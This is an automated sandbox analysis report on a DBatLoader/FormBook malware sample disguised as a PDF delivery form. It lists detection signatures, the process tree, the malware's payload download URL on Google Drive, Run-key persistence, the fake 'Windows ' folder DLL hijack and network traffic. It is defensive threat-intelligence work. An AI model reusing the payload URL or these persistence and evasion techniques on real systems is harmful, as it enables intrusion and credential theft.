Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Overview

General Information

Sample name:Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Analysis ID:1578035
MD5:72ab2a99902ec6f67b0d4df67820328e
SHA1:31477040c90aab506547fe4e4450e71b76e9345b
SHA256:406044ba7e007830321b3669505774b9e282502ac958f0cd723e5106c33c4180
Tags:exeuser-abuse_ch
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe" MD5: 72AB2A99902EC6F67B0D4DF67820328E)
    • cmd.exe (PID: 6844 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xnxcxbpC.pif (PID: 6568 cmdline: C:\Users\Public\Libraries\xnxcxbpC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Cpbxcxnx.PIF (PID: 5800 cmdline: "C:\Users\Public\Libraries\Cpbxcxnx.PIF" MD5: 72AB2A99902EC6F67B0D4DF67820328E)
    • cmd.exe (PID: 5712 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xnxcxbpC.pif (PID: 964 cmdline: C:\Users\Public\Libraries\xnxcxbpC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Cpbxcxnx.PIF (PID: 4016 cmdline: "C:\Users\Public\Libraries\Cpbxcxnx.PIF" MD5: 72AB2A99902EC6F67B0D4DF67820328E)
    • cmd.exe (PID: 1088 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xnxcxbpC.pif (PID: 3640 cmdline: C:\Users\Public\Libraries\xnxcxbpC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
{"Download Url": ["https://drive.google.com/uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK"]}
SourceRuleDescriptionAuthorStrings
0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000003.2127061894.000000007FB00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        00000000.00000002.2294905471.000000007FBD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            18.2.xnxcxbpC.pif.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.xnxcxbpC.pif.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                5.2.xnxcxbpC.pif.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  18.2.xnxcxbpC.pif.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    12.2.xnxcxbpC.pif.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                      Click to see the 2 entries

                      System Summary

                      barindex
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessId: 6620, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\xnxcxbpC.pif, CommandLine: C:\Users\Public\Libraries\xnxcxbpC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xnxcxbpC.pif, NewProcessName: C:\Users\Public\Libraries\xnxcxbpC.pif, OriginalFileName: C:\Users\Public\Libraries\xnxcxbpC.pif, ParentCommandLine: "C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe", ParentImage: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ParentProcessId: 6620, ParentProcessName: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessCommandLine: C:\Users\Public\Libraries\xnxcxbpC.pif, ProcessId: 6568, ProcessName: xnxcxbpC.pif
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessId: 6620, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Cpbxcxnx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessId: 6620, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cpbxcxnx
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Cpbxcxnx.PIF" , ParentImage: C:\Users\Public\Libraries\Cpbxcxnx.PIF, ParentProcessId: 5800, ParentProcessName: Cpbxcxnx.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 5712, ProcessName: cmd.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Cpbxcxnx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessId: 6620, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cpbxcxnx
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\xnxcxbpC.pif, CommandLine: C:\Users\Public\Libraries\xnxcxbpC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xnxcxbpC.pif, NewProcessName: C:\Users\Public\Libraries\xnxcxbpC.pif, OriginalFileName: C:\Users\Public\Libraries\xnxcxbpC.pif, ParentCommandLine: "C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe", ParentImage: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ParentProcessId: 6620, ParentProcessName: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessCommandLine: C:\Users\Public\Libraries\xnxcxbpC.pif, ProcessId: 6568, ProcessName: xnxcxbpC.pif
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-19T07:57:54.994455+010020283713Unknown Traffic192.168.2.649710172.217.17.46443TCP
                      2024-12-19T07:57:57.808246+010020283713Unknown Traffic192.168.2.649712172.217.17.65443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeAvira: detected
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFAvira: detection malicious, Label: HEUR/AGEN.1326052
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK"]}
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFReversingLabs: Detection: 57%
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeVirustotal: Detection: 54%Perma Link
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeReversingLabs: Detection: 57%
                      Source: Yara matchFile source: 18.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFJoe Sandbox ML: detected
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeJoe Sandbox ML: detected
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.6:49712 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: xnxcxbpC.pif, 00000005.00000002.2693895580.0000000022BDE000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000003.2498473359.0000000022899000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000003.2495014448.00000000226E6000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2688158342.000000001CA49000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CD8E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CBF0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2678845723.000000001C891000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2761966942.000000002C042000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C3A0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C53E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2766996142.000000002C1F9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: xnxcxbpC.pif, xnxcxbpC.pif, 0000000C.00000003.2688158342.000000001CA49000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CD8E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CBF0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2678845723.000000001C891000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2761966942.000000002C042000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C3A0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C53E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2766996142.000000002C1F9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A41000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A12000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2349827499.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2349827499.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462078533.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462078533.00000000008E2000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CD58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02CD58B4

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CEE2F8 InternetCheckConnectionA,0_2_02CEE2F8
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.217.17.65:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 172.217.17.46:443
                      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
                      Source: global trafficHTTP traffic detected: GET /download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
                      Source: global trafficHTTP traffic detected: GET /download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                      Source: global trafficDNS traffic detected: DNS query: drive.google.com
                      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2239714955.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290541272.00000000221B0000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, xnxcxbpC.pif.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
